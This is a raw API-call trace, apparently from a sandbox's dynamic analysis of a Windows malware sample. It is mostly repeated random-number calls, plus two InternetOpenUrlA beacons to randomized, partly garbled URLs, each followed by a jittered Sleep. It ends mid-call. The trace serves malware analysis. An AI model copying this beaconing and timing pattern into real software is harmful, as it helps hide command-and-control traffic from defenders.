GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0172.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0172.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17888, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a17888) returned 0x0 [0172.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.057] GetProcessHeap () returned 0x440000 [0173.057] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0173.057] lstrcpyA (in: lpString1=0x473140, lpString2="î!}ûs://www.yahoo.com" | out: lpString1="î!}ûs://www.yahoo.com") returned="î!}ûs://www.yahoo.com" [0173.057] lstrcatA (in: lpString1="î!}ûs://www.yahoo.com", lpString2="/nzpJF40Z61wHcecghlrkRWK15b/784lYtktKqm9knxOuBoJKThhxfNkb81t1oXin61x2Bv/vifu3s1np3Xz9j95kyscpgugs3bq0zs83tY/" | out: lpString1="î!}ûs://www.yahoo.com/nzpJF40Z61wHcecghlrkRWK15b/784lYtktKqm9knxOuBoJKThhxfNkb81t1oXin61x2Bv/vifu3s1np3Xz9j95kyscpgugs3bq0zs83tY/") returned="î!}ûs://www.yahoo.com/nzpJF40Z61wHcecghlrkRWK15b/784lYtktKqm9knxOuBoJKThhxfNkb81t1oXin61x2Bv/vifu3s1np3Xz9j95kyscpgugs3bq0zs83tY/" [0173.057] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0173.057] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="î!}ûs://www.yahoo.com/nzpJF40Z61wHcecghlrkRWK15b/784lYtktKqm9knxOuBoJKThhxfNkb81t1oXin61x2Bv/vifu3s1np3Xz9j95kyscpgugs3bq0zs83tY/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0173.057] GetProcessHeap () returned 0x440000 [0173.057] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0173.057] GetProcessHeap () returned 0x440000 [0173.057] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17840 | out: hHeap=0x440000) returned 1 [0173.058] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0173.058] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0173.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0173.058] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0173.058] Sleep (dwMilliseconds=0x15f9d) [0173.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0173.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0173.269] GetProcessHeap () returned 0x440000 [0173.269] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f54f0 [0173.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0173.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f54f1, cbBuffer=0x12, dwFlags=0x2 | out: pbBuffer=0x4f54f1) returned 0x0 [0173.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0173.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.274] GetProcessHeap () returned 0x440000 [0173.274] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0173.275] lstrcpyA (in: lpString1=0x472f30, lpString2="ðTO" | out: lpString1="ðTO") returned="ðTO" [0173.275] lstrcatA (in: lpString1="ðTO", lpString2="/qn7rToctHg6cebjiy/" | out: lpString1="ðTO/qn7rToctHg6cebjiy/") returned="ðTO/qn7rToctHg6cebjiy/" [0173.275] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0173.275] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="ðTO/qn7rToctHg6cebjiy/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0173.275] GetProcessHeap () returned 0x440000 [0173.275] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0173.275] GetProcessHeap () returned 0x440000 [0173.275] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f54f0 | out: hHeap=0x440000) returned 1 [0173.275] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0173.276] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0173.276] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0173.276] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0173.276] Sleep (dwMilliseconds=0x16718) [0173.385] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0173.385] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0173.385] GetProcessHeap () returned 0x440000 [0173.385] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5770 [0173.385] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0173.386] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5771, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x4f5771) returned 0x0 [0173.386] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.386] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.386] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.386] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.387] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.387] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0173.387] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.387] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.388] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.388] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.388] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.388] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.388] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0173.389] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.389] GetProcAddress (hModule=0x7ffc5bcc0000, 